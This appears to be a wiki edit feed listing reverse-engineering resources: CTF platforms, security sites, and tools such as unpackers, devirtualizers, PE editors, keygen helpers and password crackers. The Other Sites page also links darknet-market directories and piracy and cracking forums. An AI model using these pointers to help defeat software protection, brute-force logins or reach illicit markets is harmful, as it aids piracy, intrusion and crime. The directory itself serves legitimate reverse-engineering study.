::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Other_Sites&amp;diff=3311</id>
		<title>Other Sites</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Other_Sites&amp;diff=3311"/>
		<updated>2026-04-04T18:19:59Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: iranian scene&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This section is meant to highlight other sites of interest to the reverse engineer. Feel free to add to the list along with a brief description.&lt;br /&gt;
== Site Index ==&lt;br /&gt;
&lt;br /&gt;
[https://www.exploitee.rs/index.php/Main_Page Exploitee.rs] - Wiki devoted to hacking Android, IoT and GoogleTV devices.&lt;br /&gt;
&lt;br /&gt;
[https://xdaforums.com/ XDA Developers Forum] - Big Android community with developers, power users and enthusiasts.&lt;br /&gt;
&lt;br /&gt;
[https://www.eevblog.com/forum/index.php EEVblog Electronics Community Forum] - is the world's biggest engineering blog. An off-the-cuff video blog for Electronics Engineers, hobbyists, hackers and makers.&lt;br /&gt;
&lt;br /&gt;
[https://repair.wiki/w/3rd_Party_Repair_Channels Great list of 3rd Party Repair Channels] - List from repair.wiki.&lt;br /&gt;
&lt;br /&gt;
[https://repair.wiki/w/Repair_Wiki Repair.wiki] - Great resources for repairing all kinds of electronics.&lt;br /&gt;
&lt;br /&gt;
[https://deskthority.net/wiki/ Deskthority wiki] - is dedicated to mechanical keyboards, mice and other human interface devices. The main focus is everything regarding quality (mechanical) keyboards. In the nature of a wiki, the content will be frequently and constantly under construction.&lt;br /&gt;
&lt;br /&gt;
[https://discord.gg/NWuBUxC All-Things Repair Discord (formerly &amp;quot;Rossmann Group's Official Discord&amp;quot;)] - Big Repair community with developers, power users and enthusiasts.&lt;br /&gt;
&lt;br /&gt;
[https://media.ccc.de/ Chaos Computer Club Media] - The Chaos Computer Club e. V. (CCC) is the largest European hacker association and has been a mediator in the field of technical and social developments for over thirty years.&lt;br /&gt;
&lt;br /&gt;
[https://defcon.org/ Defcon] - DEF CON Groups are worldwide, local chapters of hackers, thinkers, makers and others.&lt;br /&gt;
&lt;br /&gt;
[https://thehackernews.com/ TheHackersNews] - THN is the leading and go-to source for timely and relevant breaking news from the world of cybersecurity, as well as valuable insights into the latest threats and solutions.&lt;br /&gt;
&lt;br /&gt;
[https://phishtank.org/ PhishTank] - if you &amp;quot;love&amp;quot; spam too this is your place to be. Out of the Net, into the Tank.&lt;br /&gt;
&lt;br /&gt;
[https://www.hybrid-analysis.com/ Hybrid Analysis] - Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.&lt;br /&gt;
&lt;br /&gt;
[https://www.virustotal.com/gui/home/upload VirusTotal] - was founded in 2004 as a free service that analyzes files and URLs for viruses, worms, trojans and other kinds of malicious content.&lt;br /&gt;
&lt;br /&gt;
[https://attack.mitre.org/ MITRE ATT&amp;amp;CK®] - is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&amp;amp;CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.&lt;br /&gt;
&lt;br /&gt;
[https://www.vx-underground.org/ vx-underground] - is the largest collection of malware source code, samples, and papers on the internet.&lt;br /&gt;
&lt;br /&gt;
[https://secret.club/ Secret.club] - is a blog about reverse-engineering, hacking and breaking your software in every way imaginable.&lt;br /&gt;
&lt;br /&gt;
[https://blog.malware.re/ malware.re blog] - Coleman Kane's blog about RE malware.&lt;br /&gt;
&lt;br /&gt;
[https://owasp.org/ OWASP] - driven by volunteers, OWASP resources are accessible for everyone.&lt;br /&gt;
&lt;br /&gt;
[https://webscene.ir/ Webscene.ir] is an Iranian web entity associated with web development or related technology services and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
[https://exetools.com/ ExeTools] - The tools of the trade in the RE scene.&lt;br /&gt;
&lt;br /&gt;
[https://forum.exetools.com/ ExeTools Forums] - How to improve your cracking and programming skills.&lt;br /&gt;
&lt;br /&gt;
[https://tuts4you.com/ Tuts 4 You] - is a non-commercial, independent community dedicated to the sharing of knowledge and information on reverse code engineering.&lt;br /&gt;
&lt;br /&gt;
[https://recon.cx/ Recon] - REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada.&lt;br /&gt;
&lt;br /&gt;
[https://www.offensivecon.org/ Offensive Security Conference] - OffensiveCon Berlin is a highly technical international security conference focused on offensive security only. The aim of OffensiveCon is to bring the hacker community together for high quality and deep technical talks, engaging and renowned technical trainings. The talks at OffensiveCon are focused on offensive IT security topics such as vulnerability discovery, advanced exploitation techniques and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
[https://ecqurity.com/ E-CQURITY (Short for ECQ)] - provides Advesary Simulation or Red Team service to help you truly test and validate the effectiveness of your entire security architecture.&lt;br /&gt;
&lt;br /&gt;
[https://www.exploit-db.com/ Exploit-db] - The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.&lt;br /&gt;
&lt;br /&gt;
[http://infiltratecon.com/ Infiltrate] - is a deeply technical conference that focuses entirely on offensive security issues. Groundbreaking researchers demonstrate techniques that you cannot find elsewhere.&lt;br /&gt;
&lt;br /&gt;
[https://zerosecurity.org/ Zero Security] - We provide the latest Information Security &amp;amp; Blockchain news. From website breaches to the latest phishing and malware threats impacting both sectors.&lt;br /&gt;
&lt;br /&gt;
[https://tor.taxi/ tortaxi] - is your ride to the darknet.&lt;br /&gt;
&lt;br /&gt;
[https://dark.fail/ dark.fail] - deepweb onion site links (This resource is intended for researchers only).&lt;br /&gt;
&lt;br /&gt;
[https://vormweb.de/en/ vermweb] - Another deepweb search engine.&lt;br /&gt;
&lt;br /&gt;
[https://tor.fish/ Tor.Fish] - lots of markets /w status.&lt;br /&gt;
&lt;br /&gt;
[https://cock.li/ cock.li] - get yourself professional looking E-mail or XMPP addresses.&lt;br /&gt;
&lt;br /&gt;
[https://torrentfreak.com/ TorrentFreak] - is a publication dedicated to bringing the latest news about copyright, privacy, and everything related to filesharing.&lt;br /&gt;
&lt;br /&gt;
[http://www.openrce.org/articles/ OpenRCE] - Founded in June of 2005 as the brainchild of Pedram Amini, the Open Reverse Code Engineering community was created to foster a shared learning environment among researchers interested in the field of reverse engineering.&lt;br /&gt;
&lt;br /&gt;
[https://www.bios-mods.com/forum/ Bios Mods] - Bios Mods -The Best BIOS Update and Modification Source.&lt;br /&gt;
&lt;br /&gt;
[https://cs.rin.ru/forum cs.rin.ru] - Russian &amp;amp; English Steam underground community.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3310</id>
		<title>Software Tools</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3310"/>
		<updated>2026-04-04T18:08:21Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: re-ranked list in descending order based on overall popularity&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Software_wiki_banner.png|frameless|1280x300px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!&lt;br /&gt;
==Tool Index==&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====RF Signals Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnuradio.org/ GNU Radio]  - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -&amp;gt; Import –&amp;gt; Raw Data -&amp;gt; Radio Wave File)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Firmware Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ReFirmLabs/binwalk binwalk]  - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!&lt;br /&gt;
&lt;br /&gt;
====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====&lt;br /&gt;
&lt;br /&gt;
*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] -  is a tool designed to extract files from any type of extractable file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.&lt;br /&gt;
&lt;br /&gt;
=====Themida Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.&lt;br /&gt;
&lt;br /&gt;
=====VMProtect Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
======VMProtect 2======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)&lt;br /&gt;
*vmassembler (VMProtect 2 Virtual Instruction Assembler)&lt;br /&gt;
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)&lt;br /&gt;
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)&lt;br /&gt;
*vmhook (VMProtect 2 Virtual Machine Hooking Library)&lt;br /&gt;
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)&lt;br /&gt;
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)&lt;br /&gt;
*vmdevirt (VMProtect Devirtualization)&lt;br /&gt;
&lt;br /&gt;
======VMProtect 3======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmdevirt (VMProtect 3 Static Devirtualization)&lt;br /&gt;
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)&lt;br /&gt;
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)&lt;br /&gt;
&lt;br /&gt;
=====Code Virtualizer (Oreans Technologies)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).&lt;br /&gt;
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.&lt;br /&gt;
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.&lt;br /&gt;
&lt;br /&gt;
=====Enigma Protector=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.&lt;br /&gt;
&lt;br /&gt;
======OllyDbg Scripts======&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]&lt;br /&gt;
&lt;br /&gt;
=====Generic Code Virtualizer=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Toolkit AIO====&lt;br /&gt;
=====Windows‑focused=====&lt;br /&gt;
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit &amp;quot;All-In-One&amp;quot;, Built for Security (Malware analysis, Penetration testing) &amp;amp; Educational purposes.&lt;br /&gt;
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.&lt;br /&gt;
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.&lt;br /&gt;
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.&lt;br /&gt;
&lt;br /&gt;
=====Android‑focused=====&lt;br /&gt;
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...&lt;br /&gt;
&lt;br /&gt;
====Binary PE Analysis / Editor (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers.  [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated &amp;quot;DIE&amp;quot; is a program for determining types of files. &amp;quot;DIE&amp;quot; is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.&lt;br /&gt;
&lt;br /&gt;
*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!&lt;br /&gt;
&lt;br /&gt;
*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).&lt;br /&gt;
&lt;br /&gt;
====Hex Editors====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.&lt;br /&gt;
&lt;br /&gt;
*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.&lt;br /&gt;
&lt;br /&gt;
*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.&lt;br /&gt;
&lt;br /&gt;
*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.&lt;br /&gt;
&lt;br /&gt;
====Pattern Matching / Pattern Searching====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.&lt;br /&gt;
&lt;br /&gt;
*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/stefankueng/grepWin grepWin] -  is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.&lt;br /&gt;
&lt;br /&gt;
*[https://astrogrep.sourceforge.net/  AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a &amp;quot;context&amp;quot; feature which is very nice for looking at source code.&lt;br /&gt;
&lt;br /&gt;
====Comparison Tools (Binary differences)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.&lt;br /&gt;
&lt;br /&gt;
*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).&lt;br /&gt;
&lt;br /&gt;
====IAT Reconstructors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.&lt;br /&gt;
&lt;br /&gt;
====Process Monitors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/winsiderss/systeminformer/ System Informer] - is a  free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.&lt;br /&gt;
&lt;br /&gt;
====Process Dumpers (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.&lt;br /&gt;
&lt;br /&gt;
====API monitoring ring3 (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.&lt;br /&gt;
&lt;br /&gt;
*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.&lt;br /&gt;
&lt;br /&gt;
====Hashing &amp;amp; Crypto====&lt;br /&gt;
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills.&amp;lt;br&amp;gt;&lt;br /&gt;
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.&lt;br /&gt;
&lt;br /&gt;
====Password cracking====&lt;br /&gt;
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.&lt;br /&gt;
&lt;br /&gt;
Offline&lt;br /&gt;
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.&lt;br /&gt;
&lt;br /&gt;
Online (network based bruteforce in LAN).&lt;br /&gt;
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.&lt;br /&gt;
&lt;br /&gt;
====Virtualization technology (host isolation) or sandboxes====&lt;br /&gt;
&lt;br /&gt;
*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.&lt;br /&gt;
&lt;br /&gt;
*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.&lt;br /&gt;
&lt;br /&gt;
*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.&lt;br /&gt;
&lt;br /&gt;
*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.&lt;br /&gt;
&lt;br /&gt;
*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.&lt;br /&gt;
&lt;br /&gt;
